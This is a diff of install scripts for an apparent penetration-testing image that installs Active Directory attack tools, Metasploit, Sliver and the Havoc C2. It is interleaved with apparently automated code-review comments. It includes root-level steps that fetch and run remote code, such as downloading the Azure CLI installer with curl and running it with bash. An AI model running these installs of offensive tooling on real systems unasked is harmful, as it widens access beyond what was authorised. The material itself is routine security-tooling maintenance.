@@ -797,15 +783,10 @@ function install_pkinittools() { function install_pywhisker() { colorecho "Installing pyWhisker" - git -C /opt/tools/ clone --depth 1 https://github.com/ShutdownRepo/pywhisker - cd /opt/tools/pywhisker || exit - python3 -m venv --system-site-packages ./venv - source ./venv/bin/activate - pip3 install -r requirements.txt - deactivate - add-aliases pywhisker + # CODE-CHECK-WHITELIST=add-aliases + pipx install --system-site-packages git+https://github.com/ShutdownRepo/pywhisker add-history pywhisker - add-test-command "pywhisker.py --help" + add-test-command "pywhisker --help" add-to-list "pywhisker,https://github.com/ShutdownRepo/pywhisker,PyWhisker is a Python equivalent of the original Whisker made by Elad Shamir and written in C#. This tool allows users to manipulate the msDS-KeyCredentialLink attribute of a target user/computer to obtain full control over that object. It's based on Impacket and on a Python equivalent of Michael Grafnetter's DSInternals called PyDSInternals made by podalirius." } @@ -964,7 +945,7 @@ function install_ldaprelayscan() { pip3 install -r requirements.txt # without following fix, tool raises "oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto" # see https://github.com/wbond/oscrypto/issues/78 and https://github.com/wbond/oscrypto/issues/75 - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else 
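Review bot: The `# CODE-CHECK-WHITELIST=add-aliases` marker is placed after `colorecho`, whereas every other occurrence in this diff (install_rusthound, install_rusthound-ce, install_go, install_sherlock) is the first line of the function body; if the checker keys on position this one is missed, so move it up. Since `add-aliases pywhisker` is gone, the `aliases.d/pywhisker` file, if it still exists in the repo, is now orphaned and could be removed in the same change. Switching the test to `pywhisker --help` matches the pipx entry point and the history rename.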
@@ -1030,34 +1011,55 @@ function install_rusthound() { # CODE-CHECK-WHITELIST=add-aliases colorecho "Installing RustHound" fapt gcc clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit musl-tools gcc-mingw-w64-x86-64 - git -C /opt/tools/ clone --depth 1 https://github.com/OPENCYBER-FR/RustHound + git -C /opt/tools/ clone --depth 1 https://github.com/NH-RED-TEAM/RustHound cd /opt/tools/RustHound || exit # Sourcing rustup shell setup, so that rust binaries are found when installing cme source "$HOME/.cargo/env" + # Temp fix for : https://github.com/NH-RED-TEAM/RustHound/issues/32 + local temp_fix_limit="2024-11-01" + if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then + criticalecho "Temp fix expired. Exiting." + else + cargo update -p time + fi cargo build --release + # Temp fix for : https://github.com/NH-RED-TEAM/RustHound/issues/32 + local temp_fix_limit="2024-11-01" + if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then + criticalecho "Temp fix expired. Exiting." + else + cargo update -p time + fi # Clean dependencies used to build the binary rm -rf target/release/{deps,build} ln -s /opt/tools/RustHound/target/release/rusthound /opt/tools/bin/rusthound add-history rusthound add-test-command "rusthound --help" - add-to-list "rusthound,https://github.com/OPENCYBER-FR/RustHound,BloodHound ingestor in Rust." + add-to-list "rusthound,https://github.com/NH-RED-TEAM/RustHound,BloodHound ingestor in Rust." 
} function install_rusthound-ce() { # CODE-CHECK-WHITELIST=add-aliases colorecho "Installing RustHound for BloodHound-CE" fapt gcc clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit musl-tools gcc-mingw-w64-x86-64 - git -C /opt/tools/ clone --depth 1 --branch v2 https://github.com/OPENCYBER-FR/RustHound RustHound-CE + git -C /opt/tools/ clone --depth 1 --branch v2 https://github.com/NH-RED-TEAM/RustHound RustHound-CE cd /opt/tools/RustHound-CE || exit # Sourcing rustup shell setup, so that rust binaries are found when installing cme source "$HOME/.cargo/env" + # Temp fix for : https://github.com/NH-RED-TEAM/RustHound/issues/32 + local temp_fix_limit="2024-11-01" + if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then + criticalecho "Temp fix expired. Exiting." + else + cargo update -p time@0.3.28 + fi cargo build --release # Clean dependencies used to build the binary rm -rf target/release/{deps,build} ln -v -s /opt/tools/RustHound-CE/target/release/rusthound /opt/tools/bin/rusthound-ce add-history rusthound-ce add-test-command "rusthound-ce --help" - add-to-list "rusthound (v2),https://github.com/OPENCYBER-FR/RustHound,BloodHound-CE ingestor in Rust." + add-to-list "rusthound (v2),https://github.com/NH-RED-TEAM/RustHound,BloodHound-CE ingestor in Rust." } function install_certsync() { @@ -1214,7 +1216,6 @@ function install_netexec() { mkdir -p ~/.nxc [[ -f ~/.nxc/nxc.conf ]] && mv ~/.nxc/nxc.conf ~/.nxc/nxc.conf.bak cp -v /root/sources/assets/netexec/nxc.conf ~/.nxc/nxc.conf - cp -v /root/sources/assets/grc/conf.cme /usr/share/grc/conf.cme add-aliases netexec add-history netexec add-test-command "netexec --help" 
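Review bot: In install_rusthound the temp-fix block (`local temp_fix_limit`, the date check and `cargo update -p time`) is added twice, once before and once after `cargo build --release`; the second copy runs after the binary is already built, so it only re-declares the local and touches the lockfile for nothing — delete the second copy. In install_rusthound-ce the same block uses `cargo update -p time@0.3.28`; with a `-p` pkgid spec the `@version` part selects which locked `time` package to update rather than the version to pin, so if the intent is to hold `time` at 0.3.28 the form is `cargo update -p time --precise 0.3.28` — worth confirming against the linked issue. Whichever form is right should then be used in both functions, which currently differ for no stated reason.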
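Review bot: Removing `cp -v /root/sources/assets/grc/conf.cme /usr/share/grc/conf.cme` here, together with the deletion of install_crackmapexec that also copied it, means nothing in this diff installs `/usr/share/grc/conf.cme` any more; if the netexec alias still colourises output with that grc config, it now points at a missing file. Confirm the alias was updated or the config is provided under another name (the alias file is not visible here).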
@@ -1381,6 +1382,15 @@ function install_conpass() { add-to-list "conpass,https://github.com/login-securite/conpass,Python tool for continuous password spraying taking into account the password policy." } +function install_adminer() { + colorecho "Installing adminer" + pipx install git+https://github.com/Mazars-Tech/AD_Miner + add-aliases adminer + add-history adminer + add-test-command "adminer --help" + add-to-list "AD-miner,https://github.com/Mazars-Tech/AD_Miner,Active Directory audit tool that leverages cypher queries." +} + # Package dedicated to internal Active Directory tools function package_ad() { set_env @@ -1392,7 +1402,6 @@ function package_ad() { install_pretender install_responder # LLMNR, NBT-NS and MDNS poisoner install_ldapdomaindump - install_crackmapexec # Network scanner install_sprayhound # Password spraying tool install_smartbrute # Password spraying tool install_bloodhound-py # ingestor for legacy BloodHound @@ -1486,6 +1495,7 @@ function package_ad() { install_sccmwtf # This code is designed for exploring SCCM in a lab. install_smbclientng install_conpass # Python tool for continuous password spraying taking into account the password policy. + install_adminer end_time=$(date +%s) local elapsed_time=$((end_time - start_time)) colorecho "Package ad completed in $elapsed_time seconds." diff --git a/sources/install/package_base.sh b/sources/install/package_base.sh index d0d051a94..863345975 100644 --- a/sources/install/package_base.sh +++ b/sources/install/package_base.sh 
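Review bot: `pipx install git+https://github.com/Mazars-Tech/AD_Miner` omits the `--system-site-packages` flag that the other pipx installs in this file carry (install_bloodhound-py, install_pywhisker); if that is deliberate, a short comment saying so avoids a later "fix". `add-aliases adminer` expects an `aliases.d/adminer` file that is not part of this diff, so confirm it exists or is added elsewhere, otherwise the install step fails. The tool is registered as `AD-miner` in add-to-list but tested as `adminer --help`, which presumably relies on that alias.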
@@ -51,10 +51,22 @@ function install_go() { # CODE-CHECK-WHITELIST=add-aliases,add-to-list,add-history colorecho "Installing go (Golang)" asdf plugin add golang https://github.com/asdf-community/asdf-golang.git - asdf install golang latest # 1.19 needed by sliver asdf install golang 1.19 - asdf global golang latest + #asdf install golang latest + #asdf global golang latest + # With golang 1.23 many package build are broken, temp fix to use 1.22.2 as golang latest + local temp_fix_limit="2024-11-01" + if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then + criticalecho "Temp fix expired. Exiting." + else + # 1.23 needed by BloodHound-CE + asdf install golang 1.23.0 + # Default GO version: 1.22.2 + asdf install golang 1.22.2 + asdf global golang 1.22.2 + fi + # if command -v /usr/local/go/bin/go &>/dev/null; then # return # fi @@ -177,7 +189,8 @@ function install_rvm() { rvm autolibs read-fail rvm rvmrc warning ignore allGemfiles rvm use 3.2.2@default - rvm install ruby-3.1.2 + rvm install ruby-3.1.2 # needed by cewl, pass-station, evil-winrm + rvm install ruby-3.1.5 # needed metasploit-framework rvm get head gem update add-test-command "rvm --version" @@ -420,6 +433,8 @@ function package_base() { install_exegol-history fapt software-properties-common add_debian_repository_components + cp -v /root/sources/assets/apt/sources.list.d/* /etc/apt/sources.list.d/ + cp -v /root/sources/assets/apt/preferences.d/* /etc/apt/preferences.d/ apt-get update colorecho "Starting main programs install" fapt man git lsb-release pciutils pkg-config zip unzip kmod gnupg2 wget \ diff --git a/sources/install/package_c2.sh b/sources/install/package_c2.sh index cd94a0b6f..b115873e8 100644 --- a/sources/install/package_c2.sh +++ b/sources/install/package_c2.sh 
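Review bot: `asdf install golang 1.23.0` sits inside the temp-fix block even though its own comment says 1.23 is needed by BloodHound-CE and package_ad.sh pins that version with `asdf local golang 1.23.0`; when this block is removed at expiry the 1.23 install goes with it and the BloodHound-CE build breaks. Move that install above the conditional and keep only the 1.22.2 install and `asdf global golang 1.22.2` inside it. The comment should also read `# With golang 1.23 many package builds are broken, temp fix to use 1.22.2 as golang latest`, and the two commented-out `asdf … latest` lines would benefit from a note saying they are what to restore once the fix is dropped.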
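Review bot: The comment on the new `rvm install ruby-3.1.5` line drops a word; it should read `rvm install ruby-3.1.5 # needed by metasploit-framework`. Style only.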
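Review bot: The two new `cp -v … /etc/apt/sources.list.d/` and `/etc/apt/preferences.d/` lines add repository definitions wholesale, and package_desktop.sh later installs `python3-websockify/sid` against them; the copied files are not in this diff, so confirm the preferences file pins the added suite (a `Pin-Priority` below 500 for everything from it) so that `apt-get upgrade` and unqualified `fapt` calls keep resolving to the base release and only explicit `pkg/sid` requests use it. Also confirm the sources entry carries a `Signed-By` keyring, since this runs as root during the image build. If either asset directory is empty the unmatched glob makes `cp` fail, so a comment naming the expected files would help.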
@@ -17,18 +17,25 @@ function install_pwncat() { } function install_metasploit() { - # CODE-CHECK-WHITELIST=add-history colorecho "Installing Metasploit" fapt libpcap-dev libpq-dev zlib1g-dev libsqlite3-dev git -C /opt/tools clone --depth 1 https://github.com/rapid7/metasploit-framework.git - cd /opt/tools/metasploit-framework || exit - rvm use 3.2.2@metasploit --create + cd /opt/tools/metasploit-framework || exit # rvm gemset ruby-3.1.5@metasploit-framework should be auto setup here + + # Fix msfupdate git config requirements + git config user.name "exegol" + git config user.email "exegol@localhost" + + # install dep manager gem install bundler bundle install - # Add this dependency to make the pattern_create.rb script work + + # Add missing deps + gem install rex gem install rex-text - # fixes 'You have already activated timeout 0.3.1, but your Gemfile requires timeout 0.4.1. Since timeout is a default gem, you can either remove your dependency on it or try updating to a newer version of bundler that supports timeout as a default gem.' - local temp_fix_limit="2024-08-25" + + # fixes 'You have already activated timeout 0.2.0, but your Gemfile requires timeout 0.4.1. Since timeout is a default gem, you can either remove your dependency on it or try updating to a newer version of bundler that supports timeout as a default gem.' + local temp_fix_limit="2025-06-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else 
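Review bot: The removed `rvm use 3.2.2@metasploit --create` is replaced only by a comment saying the `ruby-3.1.5@metasploit-framework` gemset "should be auto setup" on `cd`, which relies on rvm's directory hook being active in this non-interactive script; if it is not, `gem install bundler`, `bundle install` and the later msfdb wrapper path (`/usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle`) all target a gemset that was never created. An explicit `rvm use 3.1.5@metasploit-framework --create` after the `cd` keeps the install deterministic regardless of hooks; confirm whether the auto-switch actually fires in the build pipeline before relying on it. The `git config user.name`/`user.email` calls are repository-local (no `--global`), which is the right scope. The function body continues outside the hunk.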
@@ -40,11 +47,13 @@ function install_metasploit() { fapt postgresql cp -r /root/.bundle /var/lib/postgresql chown -R postgres:postgres /var/lib/postgresql/.bundle - sudo -u postgres sh -c "git config --global --add safe.directory /opt/tools/metasploit-framework && cd /opt/tools/metasploit-framework && /usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb init" + chmod -R o+rx /opt/tools/metasploit-framework/ + sudo -u postgres sh -c "git config --global --add safe.directory /opt/tools/metasploit-framework && /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb init" cp -r /var/lib/postgresql/.msf4 /root add-aliases metasploit - add-test-command "msfconsole --help" + add-history metasploit + add-test-command "msfconsole --version" add-test-command "msfdb --help" add-test-command "msfvenom --list platforms" add-to-list "metasploit,https://github.com/rapid7/metasploit-framework,A popular penetration testing framework that includes many exploits and payloads" @@ -67,7 +76,7 @@ function install_sliver() { # function below will serve as a reminder to update sliver's version regularly # when the pipeline fails because the time limit is reached: update the version and the time limit # or check if it's possible to make this dynamic - local temp_fix_limit="2024-08-25" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else 
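Review bot: `chmod -R o+rx /opt/tools/metasploit-framework/` makes the whole checkout world-readable and sets the execute bit on every regular file, not just directories; `chmod -R o+rX` gives the postgres user directory traversal while leaving file modes alone, and a narrower grant such as `setfacl -R -m u:postgres:rX /opt/tools/metasploit-framework/` avoids widening permissions for every other account in the image. The wrapper path `/usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle` is now hard-coded to the Ruby version installed in package_base.sh; a comment linking the two keeps them from drifting.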
@@ -126,7 +135,15 @@ function install_empire() { function install_havoc() { colorecho "Installing Havoc" - git -C /opt/tools/ clone --depth 1 https://github.com/HavocFramework/Havoc + # git -C /opt/tools/ clone --depth 1 https://github.com/HavocFramework/Havoc + # https://github.com/HavocFramework/Havoc/issues/516 + local temp_fix_limit="2024-11-01" + if [ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]; then + criticalecho "Temp fix expired. Exiting." + else + git -C /opt/tools/ clone https://github.com/HavocFramework/Havoc + git -C /opt/tools/Havoc checkout ea3646e055eb1612dcc956130fd632029dbf0b86 + fi # Building Team Server cd /opt/tools/Havoc/teamserver || exit go mod download golang.org/x/sys diff --git a/sources/install/package_cloud.sh b/sources/install/package_cloud.sh index 0722c88bf..c46f7596c 100644 --- a/sources/install/package_cloud.sh +++ b/sources/install/package_cloud.sh @@ -110,9 +110,7 @@ function install_azure_cli() { # splitting curl | bash to avoid having additional logs put in curl output being executed because of catch_and_retry curl -sL https://aka.ms/InstallAzureCLIDeb -o /tmp/azure-cli-install.sh bash /tmp/azure-cli-install.sh - fapt azure-cli - mv /opt/az/ /opt/tools/az/ - sed -i 's/\/opt/\/opt\/tools/' "$(which az)" + rm /tmp/azure-cli-install.sh add-history azure-cli add-test-command "az version" add-to-list "azure-cli,https://github.com/Azure/azure-cli,A great cloud needs great tools; we're excited to introduce Azure CLI our next generation multi-platform command line experience for Azure." diff --git a/sources/install/package_desktop.sh b/sources/install/package_desktop.sh index b33cfbde1..2efaf031d 100644 --- a/sources/install/package_desktop.sh +++ b/sources/install/package_desktop.sh 
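Review bot: The new date check uses single brackets, `if [ "$(date +%Y%m%d)" -gt … ]`, while every other temp-fix block added in this diff (package_ad.sh, package_base.sh, package_desktop.sh, package_web.sh) uses `[[ … ]]`; align it for consistency. Pinning the checkout to a full commit hash is the right approach for a temp fix; a one-line comment stating what that commit corresponds to upstream, beyond the issue link, will make the eventual removal easier. The function body continues past the hunk.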
@@ -16,6 +16,15 @@ function install_xfce() { # Dependencies fapt tigervnc-standalone-server tigervnc-xorg-extension tigervnc-viewer novnc websockify xfce4 dbus-x11 intltool libtool tigervnc-tools + # temp fix to use latest websockify (min 0.12.0 to fix fedora daemon issue) waiting for apt stable repo to be up-to-date + local temp_fix_limit="2024-11-01" + if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then + criticalecho "Temp fix expired. Exiting." + else + # Install websockify (min 0.12.0) explicit from sid repo + fapt python3-websockify/sid + fi + # Icons fapt librsvg2-common papirus-icon-theme @@ -93,6 +102,8 @@ function install_xfce() { # Stopping VNC server used for config vncserver -kill :0 sleep 6 + # Remove log files of temp vncserver run ## TODO check if more + rm /root/.vnc/*.log /root/.xsession-errors [[ -d "/root/.config/xfce4/" ]] || echo "Directory /root/.config/xfce4/ does not exist." # Binaries diff --git a/sources/install/package_forensic.sh b/sources/install/package_forensic.sh index cc248ca9a..2cf8a2b3d 100644 --- a/sources/install/package_forensic.sh +++ b/sources/install/package_forensic.sh 
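Review bot: `fapt python3-websockify/sid` only works if the sid source copied into `/etc/apt/sources.list.d/` by package_base.sh is already present and pinned, so this block depends on package ordering that is not visible here; a comment such as `# requires the sid source and pin added in package_base.sh` makes the coupling explicit. Because the package comes from sid, its dependencies may also be pulled from there unless the pin keeps them at the base release — worth checking `apt-cache policy python3-websockify` once in the build. The function body continues outside the hunk.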
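Review bot: `rm /root/.vnc/*.log /root/.xsession-errors` fails when either path is absent — an unmatched glob is passed literally and `.xsession-errors` may not exist after a short run — so use `rm -f /root/.vnc/*.log /root/.xsession-errors`. The `## TODO check if more` comment should either name what else is suspected to be left behind or be dropped.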
@@ -57,10 +57,13 @@ function install_volatility2() { function install_volatility3() { colorecho "Installing volatility3" git -C /opt/tools/ clone --depth 1 https://github.com/volatilityfoundation/volatility3 - pipx install --system-site-packages /opt/tools/volatility3 + cd /opt/tools/volatility3 || exit + python3 -m venv --system-site-packages ./venv + source ./venv/bin/activate + pip3 install . # volatility's setup.py installs requirements from requirements-minimal.txt. Some reqs from requirements.txt are missing, injecting now - # pipx doesn't support injection of a requirements file : https://github.com/pypa/pipx/issues/934 - sed -e '/^#/d' -e '/^-r requirements-minimal.txt/d' /opt/tools/volatility3/requirements.txt | xargs pipx inject volatility3 + pip3 install -r requirements.txt + deactivate add-aliases volatility3 add-history volatility3 add-test-command "volatility3 --help" diff --git a/sources/install/package_mobile.sh b/sources/install/package_mobile.sh index 17c3f17a2..99534d0d4 100644 --- a/sources/install/package_mobile.sh +++ b/sources/install/package_mobile.sh @@ -88,7 +88,7 @@ function install_androguard() { colorecho "Installing androguard" pipx install --system-site-packages androguard # https://github.com/androguard/androguard/issues/1060 - local temp_fix_limit="2024-07-07" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else @@ -108,7 +108,7 @@ function install_mobsf() { cd /opt/tools/MobSF || exit # pipx --preinstall git+https://github.com/MobSF/yara-python-dex.git /opt/tools/MobSF would be needed for ARM64 # in the mean time, switching to manual venv and an alias for mobsf - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." # check if pipx supports preinstall now else 
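Review bot: The kept comment `# volatility's setup.py installs requirements from requirements-minimal.txt. Some reqs from requirements.txt are missing, injecting now` still describes the removed pipx-inject approach; with the venv it should read `# setup.py only pulls requirements-minimal.txt; install the full requirements.txt into the venv as well`. The `pip3 install .` followed by `pip3 install -r requirements.txt` sequence covers what the old sed+inject pipeline did, so behaviour looks preserved.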
diff --git a/sources/install/package_most_used.sh b/sources/install/package_most_used.sh index 8f488846e..b2856f53a 100644 --- a/sources/install/package_most_used.sh +++ b/sources/install/package_most_used.sh @@ -73,7 +73,6 @@ function package_most_used() { install_gittools # Dump a git repository from a website install_ysoserial # Deserialization payloads install_responder # LLMNR, NBT-NS and MDNS poisoner - install_crackmapexec # Network scanner install_impacket # Network protocols scripts install_enum4linux-ng # Active Directory enumeration tool, improved Python alternative to enum4linux install_smbmap # Allows users to enumerate samba share drives across an entire domain diff --git a/sources/install/package_network.sh b/sources/install/package_network.sh index f1c86b142..3cdc5d79c 100644 --- a/sources/install/package_network.sh +++ b/sources/install/package_network.sh @@ -177,7 +177,7 @@ function install_eaphammer() { colorecho "Installing eaphammer" git -C /opt/tools clone --depth 1 https://github.com/s0lst1c3/eaphammer.git cd /opt/tools/eaphammer || exit - xargs apt install -y < kali-dependencies.txt + fapt apache2 dnsmasq libssl-dev libnfnetlink-dev libnl-3-dev libnl-genl-3-dev libcurl4-openssl-dev zlib1g-dev libpcap-dev python3 -m venv --system-site-packages ./venv source ./venv/bin/activate pip3 install -r pip.req diff --git a/sources/install/package_osint.sh b/sources/install/package_osint.sh index 612c8a2ed..5699f0ca2 100644 --- a/sources/install/package_osint.sh +++ b/sources/install/package_osint.sh @@ -339,6 +339,8 @@ function install_finalrecon() { python3 -m venv --system-site-packages ./venv source ./venv/bin/activate pip3 install -r requirements.txt + # https://github.com/ThePorgs/Exegol-images/issues/372 + pip3 install aiodns deactivate add-aliases finalrecon add-history finalrecon 
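Review bot: The explicit `fapt apache2 dnsmasq …` list replaces the upstream `kali-dependencies.txt`, so it will silently drift when upstream adds a dependency; a comment above it such as `# mirrors the repo's kali-dependencies.txt; re-check on each eaphammer bump` records where the list comes from and when to revisit it. The function body continues outside the hunk.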
@@ -497,7 +499,7 @@ function install_blackbird() { function install_sherlock() { # CODE-CHECK-WHITELIST=add-aliases colorecho "Installing Sherlock" - pipx install git+https://github.com/sherlock-project/sherlock + pipx install sherlock-project add-history sherlock add-test-command "sherlock --help" add-to-list "Sherlock,https://github.com/sherlock-project/sherlock,Hunt down social media accounts by username across social networks." diff --git a/sources/install/package_rfid.sh b/sources/install/package_rfid.sh index cb6e471b4..0c206dba2 100644 --- a/sources/install/package_rfid.sh +++ b/sources/install/package_rfid.sh @@ -84,7 +84,7 @@ function install_proxmark3() { add-aliases proxmark3 add-history proxmark3 add-test-command "proxmark3 --version" - add-to-list "proxmark3,https://github.com/Proxmark/proxmark3,Open source RFID research toolkit." + add-to-list "proxmark3,https://github.com/RfidResearchGroup/proxmark3,Open source RFID research toolkit." } # Package dedicated to RFID/NCF pentest tools diff --git a/sources/install/package_web.sh b/sources/install/package_web.sh index 0e4555821..9f156a3bf 100644 --- a/sources/install/package_web.sh +++ b/sources/install/package_web.sh 
@@ -54,9 +54,18 @@ function install_wfuzz() {
     colorecho "Installing wfuzz"
     apt --purge remove python3-pycurl -y
     fapt libcurl4-openssl-dev libssl-dev
-    pip3 install pycurl wfuzz
+    #pip3 install pycurl wfuzz # uncomment when issue is fix
     mkdir /usr/share/wfuzz
     git -C /tmp clone --depth 1 https://github.com/xmendez/wfuzz.git
+    # Wait for fix / PR to be merged: https://github.com/xmendez/wfuzz/issues/366
+    local temp_fix_limit="2024-11-01"
+    if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then
+        criticalecho "Temp fix expired. Exiting."
+    else
+        pip3 install pycurl # remove this line and uncomment the first when issue is fix
+        sed -i 's/pyparsing>=2.4\*;/pyparsing>=2.4.2;/' /tmp/wfuzz/setup.py
+        pip3 install /tmp/wfuzz/
+    fi
     mv /tmp/wfuzz/wordlist/* /usr/share/wfuzz
     rm -rf /tmp/wfuzz
     add-history wfuzz
@@ -402,7 +411,7 @@ function install_oneforall() {
     git -C /opt/tools/ clone --depth 1 https://github.com/shmilylty/OneForAll.git
     cd /opt/tools/OneForAll || exit
     # https://github.com/shmilylty/OneForAll/pull/340
-    local temp_fix_limit="2024-06-20"
+    local temp_fix_limit="2024-11-01"
     if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then
         criticalecho "Temp fix expired. Exiting."
     else
@@ -461,7 +470,7 @@ function install_gowitness() {
     asdf reshim golang
     add-history gowitness
     add-test-command "gowitness --help"
-    add-test-command "gowitness single https://exegol.readthedocs.io" # check the chromium dependency
+    add-test-command "gowitness scan single --url https://exegol.readthedocs.io" # check the chromium dependency
     add-to-list "gowitness,https://github.com/sensepost/gowitness,A website screenshot utility written in Golang."
 }
 
diff --git a/sources/install/package_wifi.sh b/sources/install/package_wifi.sh
index 7466c27ce..6ff9c162a 100644
--- a/sources/install/package_wifi.sh
+++ b/sources/install/package_wifi.sh
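Review bot: The `sed -i` on `/tmp/wfuzz/setup.py` in install_wfuzz is never verified, so if upstream rewrites its `pyparsing` requirement the substitution silently matches nothing and the following `pip3 install /tmp/wfuzz/` either fails later with an unrelated-looking error or installs with the unpatched constraint. Add a check right after it, `grep -q 'pyparsing>=2.4.2;' /tmp/wfuzz/setup.py || criticalecho "wfuzz temp fix did not apply"`, so the workaround fails as visibly as the expiry branch presumably does. The two new comments also read `when issue is fix`; `fixed` would be clearer. install_wfuzz continues outside the hunk.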
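Review bot: The new test command `gowitness scan single --url ...` in install_gowitness appears to use the command layout of the gowitness 3 CLI, while the line that installs gowitness is outside the hunk; if that line does not resolve to a 3.x release (or pins an older one) the test fails on the old CLI rather than on the chromium dependency it is meant to check. Confirm the installed version matches, and consider recording the assumption next to the test, e.g. `# requires the gowitness v3 CLI (scan single --url)`. The test also depends on outbound access to exegol.readthedocs.io, which was already the case before this change.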
@@ -32,7 +32,7 @@ function install_pyrit() {
     # steps to remove temp fix:
     # 1. try to install pyrit with git clone + venv + setup.py install with python2 or 3 (without the git patch)
     # 2. if it works, remove the temp fix (and probably the patch as well)
-    local temp_fix_limit="2024-06-20"
+    local temp_fix_limit="2024-11-01"
     if [ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]; then
         criticalecho "Temp fix expired. Exiting."
     else
diff --git a/sources/install/package_wordlists.sh b/sources/install/package_wordlists.sh
index 340054893..ed0737a4f 100644
--- a/sources/install/package_wordlists.sh
+++ b/sources/install/package_wordlists.sh
@@ -35,13 +35,6 @@ function install_cewler() {
     # CODE-CHECK-WHITELIST=add-aliases
     colorecho "Installing cewler"
     pipx install --system-site-packages cewler
-    # https://github.com/roys/cewler/pull/5
-    local temp_fix_limit="2024-06-20"
-    if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then
-        criticalecho "Temp fix expired. Exiting."
-    else
-        pipx inject cewler pypdf==4.0.1
-    fi
     add-history cewler
     add-test-command "cewler --output cewler.txt https://thehacker.recipes/"
     add-to-list "cewler,https://github.com/roys/cewler,CeWL alternative in Python"
@@ -76,7 +69,8 @@ function install_pass_station() {
 
 function install_username-anarchy() {
     colorecho "Installing Username-Anarchy"
-    git -C /opt/tools/ clone --depth 1 https://github.com/urbanadventurer/username-anarchy
+    #git -C /opt/tools/ clone --depth 1 https://github.com/urbanadventurer/username-anarchy
+    git -C /opt/tools/ clone https://github.com/urbanadventurer/username-anarchy
     cd /opt/tools/username-anarchy || exit
     # https://github.com/urbanadventurer/username-anarchy/pull/3
     local temp_fix_limit="2025-04-01"
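Review bot: In install_username-anarchy the old clone command is kept as a commented-out line above the new one, which leaves dead code in place of the reason `--depth 1` was dropped; presumably the full history is needed so the temp fix below (the PR referenced on the next lines) can check out a specific commit, but the hunk does not say. Replace the commented-out command with a one-line explanation, e.g. `# full clone: the temp fix below needs history beyond the HEAD commit`. Without `--depth 1` the clone also fetches whatever the default branch currently points to; if the temp fix later pins a fixed ref, that should be stated alongside. The rest of install_username-anarchy is outside the hunk.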
